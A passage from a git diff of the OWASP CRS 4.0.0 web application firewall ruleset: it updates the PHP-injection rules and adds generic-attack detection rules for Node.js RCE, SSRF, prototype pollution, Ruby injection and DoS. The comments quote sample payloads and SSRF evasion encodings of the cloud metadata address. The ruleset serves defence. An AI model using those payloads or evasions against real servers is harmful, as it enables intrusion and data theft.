setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # @@ -573,12 +577,13 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAf # regex in this case to look for these values whereas in its sibling rule we use # @pmFromFile for flexibility and performance. # -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl < regexp-933131.data +# Regular expression generated from regex-assembly/933131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933131 # # This rule is a stricter sibling of rule 933130. -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \ "id:933131,\ phase:2,\ block,\ @@ -593,11 +598,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # @@ -618,13 +622,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. -# -# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble -# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# Regular expression generated from regex-assembly/933161.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933161 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)" \ "id:933161,\ phase:2,\ block,\ @@ -639,11 +642,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # @@ -682,11 +684,10 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # [ PHP Closing Tag Found ] @@ -712,17 +713,51 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# This rule is a stricter sibling of 933210. +# Unlike 933210, this rule will also match "this is a 'dog' (not a cat)", because the semi-colon at the end of the string is optional. +# This is useful for PHP evals where the semi-colon is already hardcoded: +# +# +# Any potential function calls not at the end of a string will require a semi-colon to form valid PHP, which is automatically covered by 933210. +# +# Regular expression generated from regex-assembly/933211.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933211 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\)(?:;|$)?" \ + "id:933211,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf new file mode 100644 index 0000000000..84a619805d --- /dev/null +++ b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf @@ -0,0 +1,366 @@ +# ------------------------------------------------------------------------ +# OWASP CRS ver.4.0.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. +# +# The OWASP CRS is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ NodeJS Insecure unserialization / generic RCE signatures ] +# +# Libraries performing insecure unserialization: +# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) +# - funcster: __js_function +# +# See: +# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ +# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ +# +# Some generic snippets used: +# - function() { +# - new Function( +# - eval( +# - String.fromCharCode( +# +# Last two are used by nodejsshell.py, +# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py +# +# As base64 is sometimes (but not always) used to encode serialized values, +# use multiMatch and t:base64decode. +# +# Regular expression generated from regex-assembly/934100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934100 +# +# Stricter sibling: 934101 +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\v]+Function[\s\v]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\v]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,\ + msg:'Node.js Injection Attack 1/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# We provide only partial protection to SSRF. DNS Rebinding attacks needs +# to be handled at application level, and even those might be difficult to catch. +# +# PL1 rules are based on common attacks on cloud providers, based on well-known URLs. +# +# -=[ References ]=- +# https://highon.coffee/blog/ssrf-cheat-sheet/ +# https://cwe.mitre.org/data/definitions/918.html +# https://capec.mitre.org/data/definitions/664.html) +# +# Preventing: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf.data" \ + "id:934110,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# JavaScript prototype pollution injection attempts +# +# Example from https://hackerone.com/reports/869574 critical +# vulnerability in the TypeORM library: +# {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} +# +# Test cases are based on this list of payloads: +# https://github.com/BlackFan/client-side-prototype-pollution/blob/master/README.md +# +# See also: https://cwe.mitre.org/data/definitions/1321.html +# +# Note: only server-based (not DOM-based) attacks are covered here. +# Stricter sibling: 934131 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\[)\s*prototype)" \ + "id:934130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,\ + msg:'JavaScript Prototype Pollution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1/180/77',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Ruby generic RCE signatures ] +# +# Detects Ruby-based injection attacks. +# Example: Process.spawn("id") +# +# Regular expression generated from regex-assembly/934150.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934150 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Process[\s\v]*\.[\s\v]*spawn[\s\v]*\(" \ + "id:934150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Ruby Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ruby',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ NodeJS DoS signatures ] +# +# NodeJS runs in a single thread, so any evaluated payloads that block execution can cause an easy DoS. +# This rule attempts to block e.g. while(true). +# +# Regular expression generated from regex-assembly/934160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934160 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx while[\s\v]*\([\s\v\(]*(?:!+(?:false|null|undefined|NaN|[\+\-]?0|\"{2}|'{2}|`{2})|(?:!!)*(?:(?:t(?:rue|his)|[\+\-]?(?:Infinity|[1-9][0-9]*)|new [A-Za-z][0-9A-Z_a-z]*|window|String|(?:Boolea|Functio)n|Object|Array)\b|\{.*\}|\[.*\]|\"[^\"]+\"|'[^']+'|`[^`]+`)).*\)" \ + "id:934160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:replaceComments,\ + msg:'Node.js DoS attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP data: scheme ] +# +# PHP supports the `data:` scheme without using `//` before the content-type. +# +# Regular expression generated from regex-assembly/934170.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934170 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^data:(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*" \ + "id:934170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP data scheme attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# This rule is a stricter sibling of 934100. +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\v]*\(" \ + "id:934101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\ + msg:'Node.js Injection Attack 2/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# PL2 rules adds SSRF capture for common evasion techniques. +# +# We add captures for these evasion techniques: (see source in util/regexp-assemble/data/regexp-934120.data) +# http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) +# http://2852039166/ Dotless decimal - \d{10} +# http://7147006462/ Dotless decimal with overflow - \d{10} +# http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal - (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} +# http://0xA9FEA9FE/ Dotless hexadecimal - 0x[a-f0-9]{8} +# http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow - 0x[a-f0-9]{16} +# http://0251.0376.0251.0376/ Dotted octal - Covered by the same below +# http://0251.00376.000251.0000376/ Dotted octal with padding - (?:0{1,4}\d{3}\.){3}0{1,4}\d{3}) +# http://169.254.43518/ - (?:\d{1,3}\.){2}\.\d{5} +# http://169.16689662/ - \d{1,3}\.\d{8} +# http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below) +# http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded - 